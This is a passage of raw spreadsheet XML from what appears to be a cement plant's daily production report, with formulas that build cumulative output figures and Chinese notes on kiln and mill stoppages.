      <c r="S49" s="238">
        <f>'[13]16'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]16'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'15'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]16'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'15'!X49</f>
        <v>143.06</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176673.4</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]16'!$Y$8</f>
        <v>10450.565</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'15'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'15'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]16'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]16'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]16'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'15'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]16'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'15'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]16'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]16'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]16'!$E$24</f>
        <v>636</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'15'!H51</f>
        <v>73520.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1449919.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]16'!$I$24</f>
        <v>4170.01</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'15'!K51</f>
        <v>78237.625</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1441361.556</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]16'!$L$24</f>
        <v>43982.0589999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>97.7379088888885</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]16'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]16'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]16'!$R$30</f>
        <v>150.43</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'15'!U51</f>
        <v>3374.55</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66373.021</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]16'!$V$30</f>
        <v>31</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'15'!X51</f>
        <v>3114.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63730.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]16'!$Y$30</f>
        <v>3511.23600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]16'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]16'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'15'!H52</f>
        <v>384.86000000032</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383952.11</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]16'!$I$19</f>
        <v>683.38</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'15'!K52</f>
        <v>70297.563</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1351991.763</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]16'!$L$19</f>
        <v>35133.7400000505</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>24.2301655172762</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'[13]16'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]16'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'15'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]16'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'15'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]16'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]16'!$M$21+'[14]16'!$M$22+'[14]16'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]16'!$N$21+'[14]16'!$N$22+'[14]16'!$N$35</f>
        <v>78.67</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'15'!U53</f>
        <v>851.61</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39186.037</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]16'!$Q$21+'[14]16'!$Q$22+'[14]16'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'15'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]16'!$T$21+'[14]16'!$T$22+'[14]16'!$T$35</f>
        <v>1761.557</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]16'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'15'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]16'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'15'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]16'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]16'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]16'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]16'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'15'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]16'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'15'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]16'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]16'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'15'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]16'!$I$63</f>
        <v>247.38</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'15'!K55</f>
        <v>4521.378</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>39957.028</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]16'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]16'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]16'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]16'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]16'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]16'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]16'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]16'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]16'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'15'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'15'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]16'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：10:00-24:00避峰停机；3#磨：10:00-22:10避峰停机；4#磨：8:30-22:10避峰停机。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G57+'15'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'15'!K57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G58+'15'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'15'!K58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G59+'15'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'15'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]16'!$Q$65</f>
        <v>窑:正常。A组磨：8:55-24:00避峰停机。D1#磨：12:25-24:00避峰停机，D2#磨：12:25-24:00避峰停机。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G60+'15'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'15'!K60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'[14]16'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]16'!$E$6</f>
        <v>3568</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'15'!H61</f>
        <v>58016</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1173889</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]16'!$E$21</f>
        <v>3787.39</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'15'!K61</f>
        <v>62433.19</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1163593.27</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]16'!$H$6</f>
        <v>33351.9799999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>64.1384230769229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'[14]16'!$M$11+'[14]16'!$M$12+'[14]16'!$M$13+'[14]16'!$M$14+'[14]16'!$M$15+'[14]16'!$M$16+'[14]16'!$M$17+'[14]16'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]16'!$N$11+'[14]16'!$N$12+'[14]16'!$N$13+'[14]16'!$N$14+'[14]16'!$N$15+'[14]16'!$N$16+'[14]16'!$N$17+'[14]16'!$N$18</f>
        <v>4355</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'15'!H62</f>
        <v>42947</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>878940.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]16'!$Q$11+'[14]16'!$Q$12+'[14]16'!$Q$13+'[14]16'!$Q$14+'[14]16'!$Q$15+'[14]16'!$Q$16+'[14]16'!$Q$17+'[14]16'!$Q$18</f>
        <v>2646</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'15'!K62</f>
        <v>41849</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>876321.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]16'!$T$11+'[14]16'!$T$12+'[14]16'!$T$13+'[14]16'!$T$14+'[14]16'!$T$15+'[14]16'!$T$16+'[14]16'!$T$17+'[14]16'!$T$18</f>
        <v>19552.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>78.2105359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]16'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]16'!$M$19+'[14]16'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]16'!$N$19+'[14]16'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'15'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]16'!$Q$19+'[14]16'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'15'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]16'!$T$19+'[14]16'!$T$20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G64+'15'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'15'!K64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G65+'15'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'15'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]16'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:0:00-17:55库满停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。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G66+'15'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'15'!K66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G67+'15'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'15'!K67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'[15]16'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]16'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'15'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]16'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'15'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]16'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]16'!$Q$77</f>
        <v>1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]16'!$D$43+'[15]16'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]16'!$E$43+'[15]16'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'15'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]16'!$H$43+'[15]16'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'15'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]16'!$K$43+'[15]16'!$K$44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'[15]16'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]16'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'15'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]16'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'15'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]16'!$K$45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G71+'15'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'15'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]16'!$Q$80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G72+'15'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'15'!K72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G73+'15'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'15'!K73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G74+'15'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'15'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]16'!$Q$83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G75+'15'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'15'!K75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G76+'15'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'15'!K76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G77+'15'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'15'!K77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G78+'15'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'15'!K78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'[16]16'!$E$7</f>
        <v>239.4</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'15'!H79</f>
        <v>8087.68</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>155216.15</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]16'!$I$7</f>
        <v>532.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'15'!K79</f>
        <v>8066.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>149957.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]16'!$L$7</f>
        <v>4905.96</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.81192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'[16]16'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'15'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]16'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'15'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]16'!$Y$15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G81+'15'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'15'!K81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G82+'15'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'15'!K82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G83+'15'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'15'!K83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G84+'15'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'15'!K84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G85+'15'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'15'!K85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17/31</f>
        <v>0.548387096774194</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46008</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19253.58</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'16'!H5</f>
        <v>355310.07</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6510176.1</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24049.016</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'16'!K5</f>
        <v>389010.931</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6539082.062</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>233766.963</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>62.5045355614972</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]17'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]17'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]17'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]17'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]17'!$U$101</f>
        <v>56.6095588235294</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]17'!$V$101</f>
        <v>64.272150997151</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]17'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]17'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]17'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
